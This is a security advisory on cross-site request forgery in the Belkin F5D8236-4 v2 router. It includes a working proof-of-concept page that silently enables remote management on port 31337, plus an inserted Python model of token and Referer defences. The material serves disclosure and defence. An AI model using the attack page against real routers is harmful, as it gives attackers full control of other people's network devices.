Taking over the Belkin F5D8236-4 v2


Details

All HTML forms present in the Belkin F5D8236-4 v2 are susceptible to Cross-Site Request Forgery.

Impact

A successful attack exploiting this vulnerability can give a remote adversary full control of the victim router.

Recommendations to the vendor

  • Cross-Site Request Forgery can be prevented by including an unpredictable token in each state-changing HTTP request submitted to the web server, and rejecting any request whose token is missing or does not match. At a minimum, these tokens should be unique to each user session; it is recommended that each HTML form delivered contain its own unique token.
  • In addition to HTML form tokens, HTTP Referer checking should be enabled, so that a request whose Referer (or Origin) header does not point at the router's own interface is refused.
  • Additional information for vendors regarding immediate and long term fixes for these issues can be found on our summary page here.

Recommendations to device administrators

  • (4/13/2013) As of this date there is no available firmware upgrade that remedies this vulnerability.
  • Take additional preventative measures and precautions by following the steps outlined on our summary page here.

Proof of Concept

In the following proof of concept attack, we assume that a Belkin F5D8236-4 v2 device administrator with an active management session established with the router has browsed to a malicious web page. Once there, a hidden form is submitted automatically to the administrator's router, from the administrator's browser. Since the administrator has a current session established with the Belkin router, the browser attaches the session credentials and the router processes the form submission as if the administrator had made it.

The form (Figure 1) is pre-filled with the values required to enable the router's remote management interface on TCP port 31337. The page's script submits the form as soon as the page loads (the setTimeout delay is zero), so no interaction from the victim is required.


<html>

<head>
<title>Belkin F5D8236-4 v2 CSRF - Enable Remote MGMT.</title>
<!-- Use JavaScript debugging to bypass authentication -->
<!--*Discovered by: Jacob Holcomb 
	- Security Analyst @ Independent Security Evaluators -->
</head>

<body>

<!-- Hidden form targeting the router's settings CGI; X.X.X.X is the router's address -->
<form name="belkin" action="http://X.X.X.X/cgi-bin/system_setting.exe" 
	method="post">
<input type="hidden" name="remote_mgmt_enabled" value="1"/>
<input type="hidden" name="remote_mgmt_port" value="31337"/>
<input type="hidden" name="allow_remote_ip" value="0"/>
</form>

<script>
// Submit the hidden form as soon as the page loads; no user action is needed.
function BeLkIn() {document.belkin.submit();}
window.setTimeout(BeLkIn, 0);
</script>

</body>
</html>

Figure 1. Attack page 1.

At this point remote management is enabled on the port chosen in the form (31337), and the attacker can remotely administer, and thereby remotely control, the router.
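To make the vendor recommendations concrete against the proof of concept above, here is an added example (not Belkin's firmware code and not part of ISE's advisory) that models the `system_setting.exe` handler twice: first as the page describes it, accepting any POST from an authenticated session, and then behind a per-session, per-form, single-use token plus an Origin/Referer check. The router address `192.168.2.1`, the session identifiers, the `csrf_token` field name, the attacker hostname and the request samples are all constructed for illustration; the POST body is the one the Figure 1 form produces.

```python
# Added example (not Belkin's firmware code): a minimal model of the router's
# system_setting.exe handler, first with no CSRF defence and then behind a
# per-session, per-form token plus an Origin/Referer check.  The router
# address, session ids, csrf_token field name and request samples are
# constructed for illustration.
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlparse

ROUTER_ORIGIN = "http://192.168.2.1"  # assumed LAN address of the router

# The POST body the Figure 1 form produces, and the header the victim's
# browser attaches when that form is submitted from the attacker's page.
FORGED_BODY = "remote_mgmt_enabled=1&remote_mgmt_port=31337&allow_remote_ip=0"
FORGED_HEADERS = {"Referer": "http://attacker.example/csrf.html"}  # constructed


def apply_setting(settings, body):
    """Unprotected handler: every POST from an authenticated session is applied."""
    for key, values in parse_qs(body).items():
        settings[key] = values[0]
    return settings


class CsrfGuard:
    """Per-session, per-form single-use tokens, bound with an HMAC so a token
    issued for one session or form cannot be replayed against another."""

    def __init__(self, secret=None):
        self.secret = secret or secrets.token_bytes(32)
        self.outstanding = set()  # tokens issued but not yet consumed

    def _mac(self, session_id, form_name, nonce):
        msg = f"{session_id}|{form_name}|{nonce}".encode()
        return hmac.new(self.secret, msg, hashlib.sha256).hexdigest()

    def token_for(self, session_id, form_name):
        """Embed the result as a hidden csrf_token field when rendering form_name."""
        nonce = secrets.token_hex(16)
        token = f"{nonce}.{self._mac(session_id, form_name, nonce)}"
        self.outstanding.add(token)
        return token

    def check(self, session_id, form_name, headers, body):
        """Return (accepted, reason) for a POST to form_name from session_id."""
        # 1. Referer/Origin check: state changes must come from the router's own UI.
        source = headers.get("Origin") or headers.get("Referer")
        if not source:
            return False, "missing Origin/Referer"
        u = urlparse(source)
        if f"{u.scheme}://{u.netloc}" != ROUTER_ORIGIN:
            return False, "cross-site Referer"
        # 2. Token check: present, issued by us, bound to this session and form.
        token = parse_qs(body).get("csrf_token", [None])[0]
        if token is None or token not in self.outstanding:
            return False, "missing, unknown or already used token"
        nonce, mac = token.split(".", 1)
        if not hmac.compare_digest(mac, self._mac(session_id, form_name, nonce)):
            return False, "token bound to another session or form"
        self.outstanding.discard(token)  # single use
        return True, "ok"


def handle_setting(guard, settings, session_id, headers, body):
    """Hardened handler: apply the settings only if the CSRF guard accepts."""
    ok, reason = guard.check(session_id, "system_setting", headers, body)
    if ok:
        apply_setting(settings, body)
    return ok, reason


if __name__ == "__main__":
    settings = {"remote_mgmt_enabled": "0"}
    print("unprotected:", apply_setting(dict(settings), FORGED_BODY))
    guard = CsrfGuard()
    print("forged:", handle_setting(guard, dict(settings), "sess-A", FORGED_HEADERS, FORGED_BODY))
    token = guard.token_for("sess-A", "system_setting")
    legit = {"Referer": ROUTER_ORIGIN + "/system_setting.html"}
    print("legitimate:", handle_setting(guard, settings, "sess-A", legit,
                                        FORGED_BODY + "&csrf_token=" + token))
```

Run against the forged request, the unprotected handler flips `remote_mgmt_enabled` to 1, while the guarded handler refuses it on the cross-site Referer alone; a forged request with the Referer stripped is refused for lacking one, and one with a same-origin Referer is still refused for lacking a token. The token is the primary control: some clients omit Referer entirely, which is why the advisory lists Referer checking as an addition to tokens rather than a substitute.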

References

  • CVE-2013-3083: Cross Site Request Forgery
  • CVE-2013-3084: Cross-Site Scripting
  • CVE-2013-3085: Authentication Bypass

Credit

  • Discovered By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators
  • Exploited By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators

Contact Information

  • For more information on this particular Belkin hack, you can contact us at routers@www.ise.io
  • Alternatively, for more general information on ISE, you can reach us using contact@www.ise.io